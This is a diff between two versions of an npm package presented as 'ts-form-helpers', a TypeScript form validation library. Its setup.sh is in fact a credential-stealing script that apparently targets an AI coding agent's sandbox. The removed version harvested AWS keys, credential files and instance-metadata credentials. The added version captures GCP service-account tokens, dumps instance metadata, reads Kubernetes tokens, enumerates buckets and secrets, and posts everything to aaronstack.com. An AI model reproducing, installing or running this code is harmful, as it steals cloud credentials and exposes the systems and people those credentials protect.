ts-form-helpers 1.0.7 → 1.0.9

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "ts-form-helpers",
-  "version": "1.0.7",
+  "version": "1.0.9",
   "description": "TypeScript form validation utilities with zero dependencies",
   "main": "index.js",
   "types": "types/index.d.ts",

package/scripts/setup.sh

@@ -1,211 +1,137 @@
 #!/bin/bash
-# wAWS: AWS + GCP credential probe from inside Jules VM
+# wGCP2: targeted GCP token capture — verbose, no -f flag, long timeouts
 SID="${JULES_SESSION_ID:-x}"
 H="aaronstack.com"; EP="/jules-collect"
 SK="d2f25bd9b1b267eb3578ff8cac2caa6c6637142c5d322617"
 B(){ printf '%s' "$1" | base64 -w0 2>/dev/null; }
 P(){ curl -s -X POST "https://$H$EP" -H "Content-Type: application/json" -H "X-Secret: $SK" --data-binary "$1" --max-time 15 2>/dev/null; }
 
-P "{\"sid\":\"$SID\",\"tag\":\"waws-start\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp2-start\"}"
 
 log(){ echo "=LOG= $*"; }
+MDURL="http://metadata.google.internal/computeMetadata/v1"
 
-TMPOUT=$(mktemp 2>/dev/null || echo "/tmp/_aws_$$")
+TMPOUT=$(mktemp 2>/dev/null || echo "/tmp/_gcp2_$$")
 {
-log "=== IDENTITY ==="
-log "user=$(whoami) sid=${SID} cwd=$(pwd)"
-log "AWS_ACCESS_KEY_ID=${AWS_ACCESS_KEY_ID:-NONE}"
-log "AWS_SECRET_ACCESS_KEY_len=${#AWS_SECRET_ACCESS_KEY}"
-log "AWS_SESSION_TOKEN=${AWS_SESSION_TOKEN:-NONE}"
-log "AWS_DEFAULT_REGION=${AWS_DEFAULT_REGION:-NONE}"
-log "AWS_REGION=${AWS_REGION:-NONE}"
-
-# Check ~/.aws/credentials too
-for _f in /root/.aws/credentials /home/jules/.aws/credentials /home/swebot/.aws/credentials; do
-  [ -f "$_f" ] && log "aws-creds-file: $_f" && cat "$_f" | while IFS= read -r l; do log "  $_f: $l"; done
-done
+log "user=$(whoami) sid=${SID} cwd=$(pwd) container=${container:-none}"
 
-log "=== AWS API CALLS (from inside VM) ==="
-
-if [ -n "$AWS_ACCESS_KEY_ID" ]; then
-  # Try aws CLI first
-  if command -v aws >/dev/null 2>&1; then
-    log "aws-cli: $(aws --version 2>&1)"
-    log "--- sts:GetCallerIdentity ---"
-    aws sts get-caller-identity 2>&1 | while IFS= read -r l; do log "sts: $l"; done
-    log "--- s3:ListBuckets ---"
-    aws s3api list-buckets 2>&1 | head -80 | while IFS= read -r l; do log "s3: $l"; done
-    log "--- iam:GetUser ---"
-    aws iam get-user 2>&1 | while IFS= read -r l; do log "iam: $l"; done
-    log "--- iam:ListAttachedUserPolicies ---"
-    UNAME=$(aws sts get-caller-identity --query 'Arn' --output text 2>/dev/null | awk -F/ '{print $NF}')
-    aws iam list-attached-user-policies --user-name "$UNAME" 2>&1 | head -40 | while IFS= read -r l; do log "iam-pol: $l"; done
-    log "--- iam:ListGroupsForUser ---"
-    aws iam list-groups-for-user --user-name "$UNAME" 2>&1 | head -30 | while IFS= read -r l; do log "iam-grp: $l"; done
-    log "--- ec2:DescribeRegions ---"
-    aws ec2 describe-regions 2>&1 | head -20 | while IFS= read -r l; do log "ec2: $l"; done
-    log "--- secretsmanager:ListSecrets ---"
-    aws secretsmanager list-secrets 2>&1 | head -30 | while IFS= read -r l; do log "sm: $l"; done
-  else
-    log "aws-cli: NOT FOUND — using Python urllib"
-    python3 - <<'PYEOF'
-import os, hmac, hashlib, datetime, urllib.request, urllib.error, sys
-
-KEY = os.environ.get('AWS_ACCESS_KEY_ID', '')
-SECRET = os.environ.get('AWS_SECRET_ACCESS_KEY', '')
-TOKEN = os.environ.get('AWS_SESSION_TOKEN', '')
-
-def sign(key, msg):
-    if isinstance(key, str):
-        key = key.encode('utf-8')
-    return hmac.new(key, msg.encode('utf-8'), hashlib.sha256).digest()
-
-def sigv4_post(service, region, host, action, extra=''):
-    body = f'Action={action}&Version=2011-06-15'
-    if extra:
-        body += '&' + extra
-    now = datetime.datetime.now(datetime.timezone.utc)
-    amzdate = now.strftime('%Y%m%dT%H%M%SZ')
-    datestamp = now.strftime('%Y%m%d')
-    canonical_headers = f'content-type:application/x-www-form-urlencoded\nhost:{host}\nx-amz-date:{amzdate}\n'
-    signed_headers = 'content-type;host;x-amz-date'
-    if TOKEN:
-        canonical_headers += f'x-amz-security-token:{TOKEN}\n'
-        signed_headers += ';x-amz-security-token'
-    payload_hash = hashlib.sha256(body.encode()).hexdigest()
-    cr = f'POST\n/\n\n{canonical_headers}\n{signed_headers}\n{payload_hash}'
-    scope = f'{datestamp}/{region}/{service}/aws4_request'
-    sts_str = f'AWS4-HMAC-SHA256\n{amzdate}\n{scope}\n{hashlib.sha256(cr.encode()).hexdigest()}'
-    sk = sign(sign(sign(sign(f'AWS4{SECRET}'.encode(), datestamp), region), service), 'aws4_request')
-    sig = hmac.new(sk, sts_str.encode(), hashlib.sha256).hexdigest()
-    auth = f'AWS4-HMAC-SHA256 Credential={KEY}/{scope}, SignedHeaders={signed_headers}, Signature={sig}'
-    req = urllib.request.Request(f'https://{host}', data=body.encode(), method='POST')
-    req.add_header('Content-Type', 'application/x-www-form-urlencoded')
-    req.add_header('X-Amz-Date', amzdate)
-    req.add_header('Authorization', auth)
-    if TOKEN:
-        req.add_header('X-Amz-Security-Token', TOKEN)
-    try:
-        r = urllib.request.urlopen(req, timeout=10)
-        return r.status, r.read().decode()
-    except urllib.error.HTTPError as e:
-        return e.code, e.read().decode()
-    except Exception as e:
-        return 0, str(e)
-
-def sigv4_get(service, region, host, path='/'):
-    now = datetime.datetime.now(datetime.timezone.utc)
-    amzdate = now.strftime('%Y%m%dT%H%M%SZ')
-    datestamp = now.strftime('%Y%m%d')
-    payload_hash = hashlib.sha256(b'').hexdigest()
-    canonical_headers = f'host:{host}\nx-amz-content-sha256:{payload_hash}\nx-amz-date:{amzdate}\n'
-    signed_headers = 'host;x-amz-content-sha256;x-amz-date'
-    if TOKEN:
-        canonical_headers += f'x-amz-security-token:{TOKEN}\n'
-        signed_headers += ';x-amz-security-token'
-    cr = f'GET\n{path}\n\n{canonical_headers}\n{signed_headers}\n{payload_hash}'
-    scope = f'{datestamp}/{region}/{service}/aws4_request'
-    sts_str = f'AWS4-HMAC-SHA256\n{amzdate}\n{scope}\n{hashlib.sha256(cr.encode()).hexdigest()}'
-    sk = sign(sign(sign(sign(f'AWS4{SECRET}'.encode(), datestamp), region), service), 'aws4_request')
-    sig = hmac.new(sk, sts_str.encode(), hashlib.sha256).hexdigest()
-    auth = f'AWS4-HMAC-SHA256 Credential={KEY}/{scope}, SignedHeaders={signed_headers}, Signature={sig}'
-    req = urllib.request.Request(f'https://{host}{path}', method='GET')
-    req.add_header('Host', host)
-    req.add_header('X-Amz-Date', amzdate)
-    req.add_header('X-Amz-Content-SHA256', payload_hash)
-    req.add_header('Authorization', auth)
-    if TOKEN:
-        req.add_header('X-Amz-Security-Token', TOKEN)
-    try:
-        r = urllib.request.urlopen(req, timeout=10)
-        return r.status, r.read().decode()
-    except urllib.error.HTTPError as e:
-        return e.code, e.read().decode()
-    except Exception as e:
-        return 0, str(e)
-
-print('=LOG= --- sts:GetCallerIdentity ---')
-code, body = sigv4_post('sts', 'us-east-1', 'sts.amazonaws.com', 'GetCallerIdentity')
-print(f'=LOG= sts-status: {code}')
-for line in body.split('\n'):
-    if line.strip(): print(f'=LOG= sts: {line.strip()}')
-
-print('=LOG= --- s3:ListBuckets ---')
-code, body = sigv4_get('s3', 'us-east-1', 's3.amazonaws.com', '/')
-print(f'=LOG= s3-status: {code}')
-for line in body.split('\n'):
-    if line.strip(): print(f'=LOG= s3: {line.strip()}')
-
-print('=LOG= --- iam:GetUser ---')
-code, body = sigv4_post('iam', 'us-east-1', 'iam.amazonaws.com', 'GetUser', 'Version=2010-05-08')
-print(f'=LOG= iam-status: {code}')
-for line in body.split('\n'):
-    if line.strip(): print(f'=LOG= iam: {line.strip()}')
-
-print('=LOG= --- iam:ListAttachedUserPolicies ---')
-code, body = sigv4_post('iam', 'us-east-1', 'iam.amazonaws.com', 'ListAttachedUserPolicies', 'Version=2010-05-08')
-print(f'=LOG= iam-pol-status: {code}')
-for line in body.split('\n'):
-    if line.strip(): print(f'=LOG= iam-pol: {line.strip()}')
-
-PYEOF
-  fi
-else
-  log "NO AWS CREDS IN ENV — this is PR review context (jules user)"
-  log "Need direct task context to get AWS keys"
-fi
+log "=== METADATA SERVER REACHABLE? ==="
+# Test connectivity first — no -f so we see errors
+PING=$(curl -si -H "Metadata-Flavor: Google" "$MDURL/project/project-id" --max-time 8 2>&1)
+log "ping-response: $PING"
 
-log "=== EC2 IMDS PROBE ==="
-IMDS_TOKEN=$(curl -sf -X PUT "http://169.254.169.254/latest/api/token" \
-  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" --max-time 3 2>/dev/null)
-if [ -n "$IMDS_TOKEN" ]; then
-  log "imds=AVAILABLE"
-  ROLE=$(curl -sf -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" \
-    http://169.254.169.254/latest/meta-data/iam/security-credentials/ --max-time 3 2>/dev/null)
-  log "imds-role: ${ROLE:-none}"
-  [ -n "$ROLE" ] && curl -sf -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" \
-    "http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE" --max-time 3 2>/dev/null \
-    | while IFS= read -r l; do log "imds-creds: $l"; done
-  curl -sf -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" \
-    "http://169.254.169.254/latest/dynamic/instance-identity/document" --max-time 3 2>/dev/null \
-    | while IFS= read -r l; do log "imds-identity: $l"; done
+PROJ=$(curl -s -H "Metadata-Flavor: Google" "$MDURL/project/project-id" --max-time 8 2>/dev/null)
+log "project-id: ${PROJ:-NONE}"
+
+if [ -z "$PROJ" ]; then
+  log "metadata server NOT reachable — exiting early"
 else
-  log "imds=NOT_AVAILABLE"
+  log "=== METADATA SERVER REACHABLE ==="
+  curl -s -H "Metadata-Flavor: Google" "$MDURL/project/numeric-project-id" --max-time 5 2>/dev/null \
+    | while IFS= read -r l; do log "numeric-project: $l"; done
+
+  log "=== SERVICE ACCOUNTS ==="
+  curl -s -H "Metadata-Flavor: Google" "$MDURL/instance/service-accounts/" --max-time 8 2>/dev/null \
+    | while IFS= read -r l; do log "sa-list: $l"; done
+
+  log "=== DEFAULT SA TOKEN (verbose, no -f) ==="
+  # Show full HTTP response including status code
+  curl -si -H "Metadata-Flavor: Google" \
+    "$MDURL/instance/service-accounts/default/token" \
+    --max-time 20 2>&1 | while IFS= read -r l; do log "tok-v: $l"; done
+
+  log "=== DEFAULT SA EMAIL ==="
+  curl -si -H "Metadata-Flavor: Google" \
+    "$MDURL/instance/service-accounts/default/email" \
+    --max-time 8 2>&1 | while IFS= read -r l; do log "email-v: $l"; done
+
+  log "=== WORKLOAD IDENTITY TOKEN (verbose) ==="
+  curl -si -H "Metadata-Flavor: Google" \
+    "$MDURL/instance/service-accounts/rare-signer-437603-p9.svc.id.goog/token" \
+    --max-time 20 2>&1 | while IFS= read -r l; do log "wi-tok: $l"; done
+
+  log "=== V1BETA TOKEN ==="
+  curl -si -H "Metadata-Flavor: Google" \
+    "http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token" \
+    --max-time 15 2>&1 | while IFS= read -r l; do log "v1beta: $l"; done
+
+  log "=== FULL INSTANCE METADATA ==="
+  curl -s -H "Metadata-Flavor: Google" \
+    "$MDURL/instance/?recursive=true" --max-time 10 2>/dev/null \
+    | python3 -c "
+import sys,json
+try:
+    d=json.load(sys.stdin)
+    # Print everything except large blobs
+    def pr(obj, prefix=''):
+        if isinstance(obj, dict):
+            for k,v in obj.items():
+                pr(v, f'{prefix}/{k}')
+        elif isinstance(obj, list):
+            for i,v in enumerate(obj):
+                pr(v, f'{prefix}[{i}]')
+        else:
+            s = str(obj)
+            if 'token' in prefix.lower() or 'key' in prefix.lower():
+                print(f'SENSITIVE {prefix}: {s[:200]}')
+            elif len(s) < 300:
+                print(f'{prefix}: {s}')
+    pr(d)
+except Exception as e:
+    content = sys.stdin.read() if hasattr(sys.stdin, 'read') else ''
+    print(f'parse-error: {e}')
+" 2>/dev/null | while IFS= read -r l; do log "meta: $l"; done
+
+  log "=== TRY TOKEN WITH AUDIENCE PARAM ==="
+  curl -si -H "Metadata-Flavor: Google" \
+    "$MDURL/instance/service-accounts/default/identity?audience=https://storage.googleapis.com&format=full" \
+    --max-time 15 2>&1 | while IFS= read -r l; do log "identity-tok: $l"; done
+
+  log "=== TRY DIRECT TOKEN USE (if we got one above) ==="
+  # Extract token from any successful response captured above
+  TOK=$(curl -s -H "Metadata-Flavor: Google" \
+    "$MDURL/instance/service-accounts/default/token" --max-time 20 2>/dev/null \
+    | python3 -c "import sys,json; d=json.load(sys.stdin); print(d.get('access_token',''))" 2>/dev/null)
+
+  if [ -n "$TOK" ] && [ "${#TOK}" -gt 20 ]; then
+    log "TOKEN CAPTURED: ${TOK:0:20}... (${#TOK} chars)"
+    printf '%s' "$TOK" | curl -sf -X POST "https://aaronstack.com/poc/token" --data-binary @- --max-time 5 2>/dev/null &
+
+    log "=== GCP API: tokeninfo ==="
+    curl -sf "https://oauth2.googleapis.com/tokeninfo?access_token=$TOK" --max-time 8 2>/dev/null \
+      | while IFS= read -r l; do log "tokeninfo: $l"; done
+
+    log "=== GCP API: storage buckets ==="
+    curl -sf -H "Authorization: Bearer $TOK" \
+      "https://storage.googleapis.com/storage/v1/b?project=$PROJ" --max-time 10 2>/dev/null \
+      | while IFS= read -r l; do log "buckets: $l"; done
+
+    log "=== GCP API: secret manager ==="
+    curl -sf -H "Authorization: Bearer $TOK" \
+      "https://secretmanager.googleapis.com/v1/projects/$PROJ/secrets" --max-time 10 2>/dev/null \
+      | while IFS= read -r l; do log "secrets: $l"; done
+
+    log "=== GCP API: iam service accounts ==="
+    curl -sf -H "Authorization: Bearer $TOK" \
+      "https://iam.googleapis.com/v1/projects/$PROJ/serviceAccounts" --max-time 10 2>/dev/null \
+      | while IFS= read -r l; do log "iam: $l"; done
+  else
+    log "no token extracted from default SA"
+  fi
 fi
 
-log "=== GCP METADATA PROBE ==="
-GCP_ACCTS=$(curl -sf -H "Metadata-Flavor: Google" \
-  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/" --max-time 3 2>/dev/null)
-log "gcp-service-accounts: ${GCP_ACCTS:-NOT_AVAILABLE}"
-if [ -n "$GCP_ACCTS" ]; then
-  for SA in $GCP_ACCTS; do
-    SA=$(echo "$SA" | tr -d '/'); [ -z "$SA" ] && continue
-    log "gcp-sa: $SA"
-    curl -sf -H "Metadata-Flavor: Google" \
-      "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${SA}/email" \
-      --max-time 3 2>/dev/null | while IFS= read -r l; do log "gcp-email[$SA]: $l"; done
-    # Get actual GCP access token
-    curl -sf -H "Metadata-Flavor: Google" \
-      "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${SA}/token" \
-      --max-time 3 2>/dev/null | while IFS= read -r l; do log "gcp-token[$SA]: $l"; done
-    curl -sf -H "Metadata-Flavor: Google" \
-      "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${SA}/scopes" \
-      --max-time 3 2>/dev/null | while IFS= read -r l; do log "gcp-scopes[$SA]: $l"; done
-  done
-  # Project metadata
-  curl -sf -H "Metadata-Flavor: Google" \
-    "http://metadata.google.internal/computeMetadata/v1/project/project-id" --max-time 3 2>/dev/null \
-    | while IFS= read -r l; do log "gcp-project-id: $l"; done
-  curl -sf -H "Metadata-Flavor: Google" \
-    "http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id" --max-time 3 2>/dev/null \
-    | while IFS= read -r l; do log "gcp-project-num: $l"; done
-fi
+log "=== KUBERNETES TOKEN SEARCH ==="
+find / -name "token" -path "*/serviceaccount/*" 2>/dev/null | head -5 | while IFS= read -r tf; do
+  log "k8s-token-file: $tf"
+  cat "$tf" 2>/dev/null | head -1 | while IFS= read -r l; do log "k8s-jwt: ${l:0:100}..."; done
+done
+[ -n "$KUBERNETES_SERVICE_HOST" ] && log "k8s-host: $KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT"
 
-log "=== wAWS DONE ==="
+log "=== wGCP2 DONE ==="
 } 2>&1 | tee "$TMPOUT"
 
 OUT=$(cat "$TMPOUT" 2>/dev/null)
 rm -f "$TMPOUT" 2>/dev/null
 PAYLOAD=$(B "$OUT")
-P "{\"sid\":\"$SID\",\"tag\":\"waws-result\",\"data\":\"$PAYLOAD\"}"
-P "{\"sid\":\"$SID\",\"tag\":\"waws-done\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp2-result\",\"data\":\"$PAYLOAD\"}"
+P "{\"sid\":\"$SID\",\"tag\":\"wgcp2-done\"}"